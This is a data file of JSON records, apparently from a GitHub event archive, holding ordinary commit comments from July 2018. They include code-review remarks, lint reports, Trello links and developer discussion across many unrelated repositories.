{"id":"8000091941","type":"CommitCommentEvent","actor":{"login":"jochem33"},"repo":{"name":"jochem33/zimbabsurviv"},"payload":{"comment":{"id":29792171,"position":null,"line":null,"path":null,"commit_id":"fa4d43f3bf814febfdd465591377b6cac6d42a4f","created_at":"2018-07-22T11:48:39Z","updated_at":"2018-07-22T11:48:39Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Click to walk tiles (Nav mesh gefixt)](https://trello.com/c/n7Lore8s/1-click-to-walk-tiles-nav-mesh-gefixt)"}},"created_at":"2018-07-22T11:48:39Z"}
{"id":"8000093214","type":"CommitCommentEvent","actor":{"login":"jinshenglong"},"repo":{"name":"jinshenglong/test"},"payload":{"comment":{"id":29792173,"position":null,"line":null,"path":null,"commit_id":"16c65db73b79ec4eb44872c8123aa8ed835868cb","created_at":"2018-07-22T11:49:45Z","updated_at":"2018-07-22T11:49:45Z","author_association":"OWNER","body":"asdasdassdasdsasdasdas"}},"created_at":"2018-07-22T11:49:45Z"}
{"id":"8000093896","type":"CommitCommentEvent","actor":{"login":"VaidotasK"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29792174,"position":82,"line":96,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-22T11:50:19Z","updated_at":"2018-07-22T11:50:19Z","author_association":"NONE","body":"It's a guess out of blue: but try to check import statements, because there were two different libraries for Loader class, maybe you imported not the right one and this is the problem."}},"created_at":"2018-07-22T11:50:19Z"}
{"id":"8000096526","type":"CommitCommentEvent","actor":{"login":"R-Allison"},"repo":{"name":"yhc2017/echo2018"},"payload":{"comment":{"id":29792178,"position":null,"line":null,"path":null,"commit_id":"d2150dcd386312a70987030e18c775d621c47f58","created_at":"2018-07-22T11:52:24Z","updated_at":"2018-07-22T11:52:24Z","author_association":"MEMBER","body":"整理了此页面的代码"}},"created_at":"2018-07-22T11:52:24Z"}
{"id":"8000099364","type":"CommitCommentEvent","actor":{"login":"VaidotasK"},"repo":{"name":"udacity/ud843-QuakeReport"},"payload":{"comment":{"id":29792182,"position":49,"line":90,"path":"app/src/main/java/com/example/android/quakereport/EarthquakeActivity.java","commit_id":"78e07dce2ab5ed3a7df2b254b853a7cc7ad0b0e8","created_at":"2018-07-22T11:54:44Z","updated_at":"2018-07-22T11:54:44Z","author_association":"NONE","body":"Instead of lines 85 and 90, could we just use getLoaderManager.initLoader(EARTHQUAKE_LOADER_ID, null, this);\r\nDo these two different usages have any kind of pros and cons?"}},"created_at":"2018-07-22T11:54:44Z"}
{"id":"8000099665","type":"CommitCommentEvent","actor":{"login":"C1kir"},"repo":{"name":"Unbinilium/Twist"},"payload":{"comment":{"id":29792183,"position":null,"line":null,"path":null,"commit_id":"40f09d18753e8454dc3e3d7dac7821db9e493241","created_at":"2018-07-22T11:55:00Z","updated_at":"2018-07-22T11:55:00Z","author_association":"NONE","body":"目前发现 BBR 安装失败，不知道作者是否有更新计划"}},"created_at":"2018-07-22T11:55:00Z"}
{"id":"8000100911","type":"CommitCommentEvent","actor":{"login":"BarbzYHOOL"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":29792189,"position":null,"line":null,"path":null,"commit_id":"bdbdc8030ac75f530595377a8c8fc044e36d975e","created_at":"2018-07-22T11:56:03Z","updated_at":"2018-07-22T11:56:03Z","author_association":"MEMBER","body":"Yes, we need to open PRs when not certain of the result so other people can review them."}},"created_at":"2018-07-22T11:56:03Z"}
{"id":"8000109416","type":"CommitCommentEvent","actor":{"login":"Kern046"},"repo":{"name":"Kalaxia/game-api"},"payload":{"comment":{"id":29792207,"position":19,"line":null,"path":"manager/ship/shipManager.go","commit_id":"72bb23bb681001142c11038ab292a24f06a96134","created_at":"2018-07-22T12:02:38Z","updated_at":"2018-07-22T12:02:38Z","author_association":"CONTRIBUTOR","body":"Pas besoin de préciser que tu veux la colonne Id, l'orm te retourne par défaut tous les champs non relationnels de ton entité :) (encore plus si tu fais ship.*)"}},"created_at":"2018-07-22T12:02:38Z"}
{"id":"8000110232","type":"CommitCommentEvent","actor":{"login":"SwiftFlying"},"repo":{"name":"JyeSmith/rx5808-pro-diversity"},"payload":{"comment":{"id":29792214,"position":null,"line":null,"path":null,"commit_id":"e26dcade340bc1f7310cc18ff8ae5befa997ae84","created_at":"2018-07-22T12:03:16Z","updated_at":"2018-07-22T12:03:16Z","author_association":"NONE","body":"If you are interested, we can develop a new RX module which is better than furiousfpv product. We can communicate via e-mail."}},"created_at":"2018-07-22T12:03:16Z"}
{"id":"8000116959","type":"CommitCommentEvent","actor":{"login":"neomilium"},"repo":{"name":"neomilium/arduino-max7456"},"payload":{"comment":{"id":29792223,"position":null,"line":null,"path":null,"commit_id":"c1d88c474259c9432c6bdd5ed4a92b5d11139fd5","created_at":"2018-07-22T12:07:54Z","updated_at":"2018-07-22T12:07:54Z","author_association":"OWNER","body":"Hello,\r\n\r\nYou should look at MAX7456 datasheet and see if tweaking registers improve stability.\r\n\r\nIf you found something relevant, I will be happy to improve library."}},"created_at":"2018-07-22T12:07:54Z"}
{"id":"8000117159","type":"CommitCommentEvent","actor":{"login":"titan73"},"repo":{"name":"wine-staging/wine-staging"},"payload":{"comment":{"id":29792226,"position":9,"line":5,"path":"patches/d3dx9_36-DXTn/0001-d3dx9_36-Add-dxtn-support.patch","commit_id":"82eedec6edf033e17f7f87391c98110025232201","created_at":"2018-07-22T12:08:03Z","updated_at":"2018-07-22T12:08:03Z","author_association":"NONE","body":"Hi. Author has been changed while only an availability check has been removed from the patch."}},"created_at":"2018-07-22T12:08:03Z"}
{"id":"8000118391","type":"CommitCommentEvent","actor":{"login":"eFrysTon"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29792233,"position":null,"line":null,"path":null,"commit_id":"19a4b1e22fb884985aa8ecca7c8d4a796d59155b","created_at":"2018-07-22T12:09:01Z","updated_at":"2018-07-22T12:09:01Z","author_association":"CONTRIBUTOR","body":"This fixes issue #479."}},"created_at":"2018-07-22T12:09:01Z"}
{"id":"8000123021","type":"CommitCommentEvent","actor":{"login":"kimbugp"},"repo":{"name":"kimbugp/MyDiary"},"payload":{"comment":{"id":29792241,"position":12,"line":17,"path":"app/.travis.yml","commit_id":"85318384903f5655217b190b397ad767915d8e32","created_at":"2018-07-22T12:12:38Z","updated_at":"2018-07-22T12:12:38Z","author_association":"OWNER","body":"remove"}},"created_at":"2018-07-22T12:12:38Z"}
{"id":"8000123101","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29792242,"position":null,"line":null,"path":null,"commit_id":"7f9ff7bbdabfc0d54c298bb67cf7adac936badbe","created_at":"2018-07-22T12:12:42Z","updated_at":"2018-07-22T12:12:42Z","author_association":"OWNER","body":"you know I have a script that updates all gst-* ports at once?\r\nsee the miscellaneous subdirectory in the Scripts/ directory for how I do it.\r\nI just commit them all at once after build testing them all at once."}},"created_at":"2018-07-22T12:12:42Z"}
{"id":"8000123841","type":"CommitCommentEvent","actor":{"login":"littlefive"},"repo":{"name":"littlefive/Leetcode"},"payload":{"comment":{"id":29792243,"position":null,"line":null,"path":null,"commit_id":"5bfebca5307e9bd026ae0099c9d6a43986ebf03d","created_at":"2018-07-22T12:13:16Z","updated_at":"2018-07-22T12:13:16Z","author_association":"OWNER","body":"存在重复元素"}},"created_at":"2018-07-22T12:13:16Z"}
{"id":"8000123991","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29792245,"position":26,"line":53,"path":"os_resource_classes/__init__.py","commit_id":"bd5d3eb786eed887f94ac7b93081c4f2d245e760","created_at":"2018-07-22T12:13:22Z","updated_at":"2018-07-22T12:13:22Z","author_association":"OWNER","body":"So, just for the sake of the record I've never thought we should have a normalize_name for either of resource classes or traits. It could make sense to have a validate_name but a normalize_name means that code is allowed to construct invalid resource {classes, traits} and then magically turn them into something valid. They should just make valid ones in the first place. I'm guessing you're thinking \"well if people are creating resource {classes, traits} commonly from things in their environment it would be nice to be able to automate the translation of a set of words into the right structure\".\r\n\r\nIn my head, if that kind of translation _is_ happening then it is going to have details which are important to the source data (the collection of words). That it each code/project environment should do its own.\r\n\r\nI'm not explaining this because I reject your idea (I'm fine with doing it) but rather to point some of the differences in the way we think about where authority and flexibility should live in software systems. I want _any_ code (whether it uses os_resource_classes or not) to be able to make it's own choices about how it constructs things and to be able to validate those choices against one thing only: the placement API. Distributing validation to both a library and the placement API is (in my admittedly somewhat twisted head) simultaneously a dangerous distribution of authority and a limiter on client flexibility and diversity.\r\n\r\nIdeally there wouldn't be an os-resource-classes at all because it is distributing authority about the standard classes away from placement itself, but I can accept the convenience that it grants. Also I'm aware I'm never going to win the battle of \"just use strings\" (instead of variables) when it comes to classes and traits."}},"created_at":"2018-07-22T12:13:22Z"}
{"id":"8000126163","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792251,"position":null,"line":null,"path":null,"commit_id":"b084d3e6e33f1dc3f6765e08ce467c07bf8496b9","created_at":"2018-07-22T12:15:08Z","updated_at":"2018-07-22T12:15:08Z","author_association":"OWNER","body":"## Detekt report:\n❌\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L18)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L20)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L22)\n- [EmptyIfBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L26)\n- [EmptyElseBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L28)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L33)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/Factory.kt#L11)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L16)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L22)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L26)\n- [MagicNumber - [myFunc]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/KotlinPresenter.kt#L38)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/b084d3e6e33f1dc3f6765e08ce467c07bf8496b9/Factory.kt#L11)\n"}},"created_at":"2018-07-22T12:15:08Z"}
{"id":"8000126336","type":"CommitCommentEvent","actor":{"login":"cdent"},"repo":{"name":"cdent/os-resource-classes"},"payload":{"comment":{"id":29792252,"position":44,"line":44,"path":"os_resource_classes/__init__.py","commit_id":"e1094e23c3070e791f3f1a1f9837e1f7a42de862","created_at":"2018-07-22T12:15:13Z","updated_at":"2018-07-22T12:15:13Z","author_association":"OWNER","body":"Another option here would be to put these strings into a yaml. If we did that then\r\n\r\n* they could be consumed easily by other languages\r\n* they could have metadata associated, including the description and such like\r\n\r\nIf that was done, I'd still think that the python code would _only_ associated the symbol with the name, not with any of the other data."}},"created_at":"2018-07-22T12:15:13Z"}
{"id":"8000127087","type":"CommitCommentEvent","actor":{"login":"pcbartholomew"},"repo":{"name":"pcbartholomew/HelloWorld"},"payload":{"comment":{"id":29792254,"position":4,"line":13,"path":"HelloWorld/HelloWorld/Program.cs","commit_id":"9f2094379c28381ff26d86967fd9b4821dfbfe69","created_at":"2018-07-22T12:15:49Z","updated_at":"2018-07-22T12:15:49Z","author_association":"OWNER","body":"Added a variable to hold the \"Hello World\" message."}},"created_at":"2018-07-22T12:15:49Z"}
{"id":"8000130121","type":"CommitCommentEvent","actor":{"login":"deathbeam"},"repo":{"name":"Adam-/runelite"},"payload":{"comment":{"id":29792258,"position":152,"line":220,"path":"runelite-client/src/main/java/net/runelite/client/game/LootManager.java","commit_id":"c3e90cba96c560f41095ed536b02b9c1feb2e2be","created_at":"2018-07-22T12:18:18Z","updated_at":"2018-07-22T12:18:18Z","author_association":"NONE","body":"This will not work, isnt scene location packed? and not world location, so you need to create world point from local point?"}},"created_at":"2018-07-22T12:18:18Z"}
{"id":"8000132320","type":"CommitCommentEvent","actor":{"login":"TheAssassin"},"repo":{"name":"TheAssassin/AppImageLauncher"},"payload":{"comment":{"id":29792266,"position":null,"line":null,"path":null,"commit_id":"c3e1b274c65f7ecf31e784cf1664d007dd9ff1a1","created_at":"2018-07-22T12:20:08Z","updated_at":"2018-07-22T12:20:08Z","author_association":"OWNER","body":"Please open an issue about this, a commit is not the right place to talk about issues (nobody's going to find that in a month).\r\n\r\nI don't know where those CFLAGS are coming from, but they seem to break the build command. Are those really necessary?"}},"created_at":"2018-07-22T12:20:08Z"}
{"id":"8000133001","type":"CommitCommentEvent","actor":{"login":"hainm"},"repo":{"name":"arose/nglview"},"payload":{"comment":{"id":29792268,"position":null,"line":null,"path":null,"commit_id":"98b8ce78f3669273c0fd06632a4894d4d1f75d5b","created_at":"2018-07-22T12:20:37Z","updated_at":"2018-07-22T12:20:37Z","author_association":"COLLABORATOR","body":"Sounds good. Thanks.\n\nOn Sun, Jul 22, 2018 at 4:38 AM Martin K. Scherer <notifications@github.com>\nwrote:\n\n> do you want to be added as a maintainer for the feedstock @hainm\n> <https://github.com/hainm>?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/arose/nglview/commit/98b8ce78f3669273c0fd06632a4894d4d1f75d5b#commitcomment-29791621>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEPudR4M-JhLhupUWKVoSDUY1OdmIGd0ks5uJDn0gaJpZM4VZ6kE>\n> .\n>\n"}},"created_at":"2018-07-22T12:20:37Z"}
{"id":"8000134264","type":"CommitCommentEvent","actor":{"login":"sandy1232"},"repo":{"name":"sandy1232/massage-confignon"},"payload":{"comment":{"id":29792271,"position":null,"line":null,"path":null,"commit_id":"64901b42694974d9c0ac0b7185426f1a937fbbe4","created_at":"2018-07-22T12:21:38Z","updated_at":"2018-07-22T12:21:38Z","author_association":"OWNER","body":"(images/massage-confignon-massage-essentiel-dos.jpg){: class=\"img-responsive img-rounded\" }"}},"created_at":"2018-07-22T12:21:38Z"}
{"id":"8000134699","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29792273,"position":19,"line":65,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-22T12:21:59Z","updated_at":"2018-07-22T12:21:59Z","author_association":"OWNER","body":"Yes, by mistake."}},"created_at":"2018-07-22T12:21:59Z"}
{"id":"8000146112","type":"CommitCommentEvent","actor":{"login":"zeihng"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29792297,"position":null,"line":null,"path":null,"commit_id":"25a1a75e808c3311c54fd7a71a6c07836f6aa0bd","created_at":"2018-07-22T12:31:16Z","updated_at":"2018-07-22T12:31:16Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GH - first shot](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T12:31:16Z"}
{"id":"8000148513","type":"CommitCommentEvent","actor":{"login":"bmbouter"},"repo":{"name":"pulp/pulp_file"},"payload":{"comment":{"id":29792299,"position":79,"line":39,"path":"pulp_file/app/tasks/synchronizing.py","commit_id":"c23bec069e12a485000f048e486e1d89cce65beb","created_at":"2018-07-22T12:33:11Z","updated_at":"2018-07-22T12:33:11Z","author_association":"MEMBER","body":"@gmbnomis I agree completely. I've gone with the second option, so additional commits on this branch introduce a class called `FirstStage`. I'm going to open a PR this week for the entire work. I link you to it to get more input hopefully. Thanks for the comments!"}},"created_at":"2018-07-22T12:33:11Z"}
{"id":"8000150834","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":29792304,"position":null,"line":null,"path":null,"commit_id":"fd763231441492a0f900e8c9227b3b2dd1ee321c","created_at":"2018-07-22T12:35:06Z","updated_at":"2018-07-22T12:35:06Z","author_association":"NONE","body":"Did you get insta-crash while running GPS? I had to use this patch to make GPS work properly\r\nhttps://github.com/cm-3470/android_device_samsung_smdk3470-common/blob/lineage-15.1/patch/hardware_interfaces/0001-gps.default.so-fix-crash-on-access-to-unset-AGpsRilC.patch"}},"created_at":"2018-07-22T12:35:06Z"}
{"id":"8000151054","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"AnikHasibul/BingBot"},"payload":{"comment":{"id":29792305,"position":204,"line":null,"path":"bingBot.go","commit_id":"d45dcf8be23b2d4dcfe2a7d32c15f2f70f3345ca","created_at":"2018-07-22T12:35:16Z","updated_at":"2018-07-22T12:35:16Z","author_association":"NONE","body":"golint: exported function String should have comment or be unexported"}},"created_at":"2018-07-22T12:35:16Z"}
{"id":"8000154126","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792314,"position":6,"line":6,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:37:48Z","updated_at":"2018-07-22T12:37:48Z","author_association":"NONE","body":"**BAD PRACTICE**\r\n\r\nUse INTX_MAX to represent integer range infinite number"}},"created_at":"2018-07-22T12:37:48Z"}
{"id":"8000154763","type":"CommitCommentEvent","actor":{"login":"Nick-Hall"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29792315,"position":null,"line":null,"path":null,"commit_id":"4211dbf9f51ab106de5a11f3b52aa82aa955c3d4","created_at":"2018-07-22T12:38:17Z","updated_at":"2018-07-22T12:38:17Z","author_association":"MEMBER","body":"@espenberg You need to do a `git pull --rebase`.  It looks like you forgot the `--rebase`.\r\n\r\nNo harm done.  We may not even tidy it up.  @jralls  What do you think?"}},"created_at":"2018-07-22T12:38:17Z"}
{"id":"8000155956","type":"CommitCommentEvent","actor":{"login":"mdsefat"},"repo":{"name":"mdsefat/mdsefat.github.io"},"payload":{"comment":{"id":29792319,"position":null,"line":null,"path":null,"commit_id":"396403cf19d03b9b5218091ede66dcf8debf08c5","created_at":"2018-07-22T12:39:18Z","updated_at":"2018-07-22T12:39:18Z","author_association":"OWNER","body":"main files f test"}},"created_at":"2018-07-22T12:39:18Z"}
{"id":"8000158178","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792321,"position":26,"line":26,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:41:07Z","updated_at":"2018-07-22T12:41:07Z","author_association":"NONE","body":"Why do you use double pointer as parameter here?\r\nis it not enough just to use single pointer?"}},"created_at":"2018-07-22T12:41:07Z"}
{"id":"8000158768","type":"CommitCommentEvent","actor":{"login":"aashutoshrathi"},"repo":{"name":"aashutoshrathi/vision"},"payload":{"comment":{"id":29792323,"position":null,"line":null,"path":null,"commit_id":"733fbd428c4ccd58636b7c057667eb3da3b443e1","created_at":"2018-07-22T12:41:35Z","updated_at":"2018-07-22T12:41:35Z","author_association":"OWNER","body":"Thanks ❤️ "}},"created_at":"2018-07-22T12:41:35Z"}
{"id":"8000160083","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792325,"position":26,"line":26,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:42:34Z","updated_at":"2018-07-22T12:42:34Z","author_association":"NONE","body":"Besides, is this function not used here?"}},"created_at":"2018-07-22T12:42:34Z"}
{"id":"8000160885","type":"CommitCommentEvent","actor":{"login":"algizator2"},"repo":{"name":"algizator2/cdlc_platform"},"payload":{"comment":{"id":29792327,"position":14,"line":52,"path":"app/javascript/styles/trading-modal.sass","commit_id":"abbae67b207904e8ed63ad7bfb204e2dd2e3e50b","created_at":"2018-07-22T12:43:11Z","updated_at":"2018-07-22T12:43:11Z","author_association":"OWNER","body":"Feature for normalize modal height."}},"created_at":"2018-07-22T12:43:11Z"}
{"id":"8000161872","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792328,"position":162,"line":162,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:44:01Z","updated_at":"2018-07-22T12:44:01Z","author_association":"NONE","body":"Do not pass pointer's address.\r\nJust pass pointer as input."}},"created_at":"2018-07-22T12:44:01Z"}
{"id":"8000162336","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792330,"position":34,"line":34,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:44:21Z","updated_at":"2018-07-22T12:44:21Z","author_association":"NONE","body":"Double pointer => single pointer"}},"created_at":"2018-07-22T12:44:21Z"}
{"id":"8000162475","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792331,"position":53,"line":53,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:44:27Z","updated_at":"2018-07-22T12:44:27Z","author_association":"NONE","body":"Double pointer => single pointer\r\n"}},"created_at":"2018-07-22T12:44:27Z"}
{"id":"8000162841","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792332,"position":62,"line":62,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:44:45Z","updated_at":"2018-07-22T12:44:45Z","author_association":"NONE","body":"Double pointer => single pointer"}},"created_at":"2018-07-22T12:44:45Z"}
{"id":"8000162954","type":"CommitCommentEvent","actor":{"login":"run2death"},"repo":{"name":"nextcloud/external"},"payload":{"comment":{"id":29792333,"position":null,"line":null,"path":null,"commit_id":"46fd07f320e529fed630011ab7b575993e67aa44","created_at":"2018-07-22T12:44:50Z","updated_at":"2018-07-22T12:44:50Z","author_association":"NONE","body":"It helps."}},"created_at":"2018-07-22T12:44:50Z"}
{"id":"8000162972","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792334,"position":73,"line":73,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:44:51Z","updated_at":"2018-07-22T12:44:51Z","author_association":"NONE","body":"Double pointer => single pointer"}},"created_at":"2018-07-22T12:44:51Z"}
{"id":"8000164484","type":"CommitCommentEvent","actor":{"login":"sandy1232"},"repo":{"name":"sandy1232/massage-confignon"},"payload":{"comment":{"id":29792340,"position":null,"line":null,"path":null,"commit_id":"64901b42694974d9c0ac0b7185426f1a937fbbe4","created_at":"2018-07-22T12:46:03Z","updated_at":"2018-07-22T12:46:03Z","author_association":"OWNER","body":"![Massage essentiel dos](images/massage-confignon-massage-essentiel-dos.jpg){: class=\"img-responsive img-rounded\" }\r\n"}},"created_at":"2018-07-22T12:46:03Z"}
{"id":"8000164697","type":"CommitCommentEvent","actor":{"login":"nandy-andy"},"repo":{"name":"devoxx4kidspl/devoxx4kidspl.github.io"},"payload":{"comment":{"id":29792341,"position":null,"line":null,"path":null,"commit_id":"5fa218782a6d3c9a6dcaa6ad1fdf03abfb240fef","created_at":"2018-07-22T12:46:12Z","updated_at":"2018-07-22T12:46:12Z","author_association":"CONTRIBUTOR","body":"CNAME? Ależ click-bait - od razu kliknalem, bo myslalem, ze zmieniamy ;-D"}},"created_at":"2018-07-22T12:46:12Z"}
{"id":"8000164988","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792345,"position":100,"line":100,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:46:27Z","updated_at":"2018-07-22T12:46:27Z","author_association":"NONE","body":"Double pointer => single pointer"}},"created_at":"2018-07-22T12:46:27Z"}
{"id":"8000166082","type":"CommitCommentEvent","actor":{"login":"wushakun"},"repo":{"name":"wushakun/wushakun.github.io"},"payload":{"comment":{"id":29792349,"position":null,"line":null,"path":null,"commit_id":"406dfe4336d9d51d82d651cd60bcc1d42514a85e","created_at":"2018-07-22T12:47:20Z","updated_at":"2018-07-22T12:47:20Z","author_association":"OWNER","body":"reback"}},"created_at":"2018-07-22T12:47:20Z"}
{"id":"8000166262","type":"CommitCommentEvent","actor":{"login":"zenmumbler"},"repo":{"name":"whatwg/streams"},"payload":{"comment":{"id":29792350,"position":null,"line":null,"path":null,"commit_id":"a27a1fd0f8640d6054e0cbc8b6d7f5464dd096ab","created_at":"2018-07-22T12:47:28Z","updated_at":"2018-07-22T12:47:28Z","author_association":"NONE","body":"Hi, I'm adding these changes to my implementation and while the new test `piping/then-interception` now passes nicely, I'm getting test failures in many basic tests as they try to pass in objects created with `ReadableStreamCreateReadResult` as the `actual` param of `assert_object_equals`, which tries to call `actual.hasOwnProperty` which is not there.\r\n\r\nEasy to test by trying to run e.g. `readable-streams/cancel.html` but other tests in the readable-streams dir have failures as well.\r\n\r\nI realise the fix should be in the WPT repo but figured I report this here as this is the source of the failures. I just pulled from WPT so I either I'm doing something wrong or the tests are now broken.\r\n\r\nPing @ricea "}},"created_at":"2018-07-22T12:47:28Z"}
{"id":"8000166902","type":"CommitCommentEvent","actor":{"login":"kwangilcho"},"repo":{"name":"me0768/data-structure"},"payload":{"comment":{"id":29792353,"position":156,"line":156,"path":"graph/12_dijkstra_new.c","commit_id":"f4e55edfd31f9ca66fc19a8ba9e702e75465efa3","created_at":"2018-07-22T12:47:56Z","updated_at":"2018-07-22T12:47:56Z","author_association":"NONE","body":"Make function name verb.\r\nHow about just `Relax`"}},"created_at":"2018-07-22T12:47:56Z"}
{"id":"8000167265","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29792354,"position":31,"line":77,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-22T12:48:11Z","updated_at":"2018-07-22T12:48:11Z","author_association":"OWNER","body":"Avoiding check might not be possible, since we have to control the visibility of popup likewise. "}},"created_at":"2018-07-22T12:48:11Z"}
{"id":"8000168662","type":"CommitCommentEvent","actor":{"login":"TeiXeR"},"repo":{"name":"Ludeon/RimWorld-de"},"payload":{"comment":{"id":29792357,"position":null,"line":null,"path":null,"commit_id":"ec34f8b2472c5b2d1fb0a9bd9dde12e6e0b78e7e","created_at":"2018-07-22T12:49:14Z","updated_at":"2018-07-22T12:49:14Z","author_association":"CONTRIBUTOR","body":"Nach diesem Commit sind leider viele Körperteile (von Tieren als auch von Menschen) nicht mehr übersetzt."}},"created_at":"2018-07-22T12:49:14Z"}
{"id":"8000170286","type":"CommitCommentEvent","actor":{"login":"diparthshah"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29792361,"position":55,"line":101,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"0c78fde0c4c87b251838faa4184e76f6d579f910","created_at":"2018-07-22T12:50:23Z","updated_at":"2018-07-22T12:50:23Z","author_association":"OWNER","body":"i can currently set them using `Ractive.find()` as `usagePopup = @find('.netlogo-codeusage-popup')`.\r\n"}},"created_at":"2018-07-22T12:50:23Z"}
